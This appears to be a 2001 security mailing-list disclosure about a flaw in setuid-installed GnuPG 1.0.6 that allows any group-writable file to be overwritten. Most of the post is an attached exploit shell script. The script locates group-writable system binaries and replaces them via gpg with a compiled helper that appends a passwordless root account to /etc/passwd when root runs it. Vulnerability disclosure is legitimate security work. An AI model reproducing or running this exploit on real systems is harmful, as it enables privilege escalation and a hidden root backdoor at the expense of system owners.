Possible problem with GnuPG 1.0.6

[Przemyslaw Frasunek <venglin () freebsd lublin pl>]

Hello,

I've just found out strange behaviour with GnuPG 1.0.6 installed setuid
(default on Mandrake, probably others?). When decrypting file, it allows to
overwrite any group-writeable file in system.

It works for me on Mandrake 8.1, because few system binaries are
installed group-writeable (especially smbmount and smbumount). Exploit
attached.

#!/bin/sh

# babcia padlina 2001
# especially for pcoa :)
#
# GnuPG when installed setuid allows overwriting any group-writable
# files.
#
# Tested on generic Mandrake 8.1
 
if [ ! -x /usr/bin/gpg -o ! -u /usr/bin/gpg ]; then
  echo "GnuPG not installed or not setuid."
  exit 1
fi

if [ ! -x /usr/bin/gcc ]; then
  echo "gcc not installed."
  exit 1
fi

echo "Looking for group-writeable binaries..."
echo

BINS=`/usr/bin/find /bin /sbin /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin /usr/X11R6/bin -type f -perm -0020 
2>/dev/null`

if [ "X$BINS" != "X" ]; then
  echo "$BINS"
else
  echo "Sorry, this system is not exploitable."
  exit 1
fi

echo
echo "Compiling helper binary..."
echo

cat > own.c << __EOF__
main() { if (!getuid()) { system("echo \"babunia::0:0::/:/bin/sh\" >> /etc/passwd"); } }
__EOF__

/usr/bin/gcc -o own own.c > /dev/null 2>&1

if [ ! -x own ]; then
  echo "Compilation failed."
  exit 1
fi

rm -f own.c

echo "Overwriting binaries... Please confirm each one."
echo

for i in $BINS; do
  rm -f own.gpg
  echo owned | gpg --passphrase-fd 0 -c own
  echo owned | gpg --passphrase-fd 0 -o $i own.gpg
done

rm -f own own.gpg

echo
echo "Looks like everything is done. When root will run any of above"
echo "binaries, user babunia will be added with root privs."

-- 
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *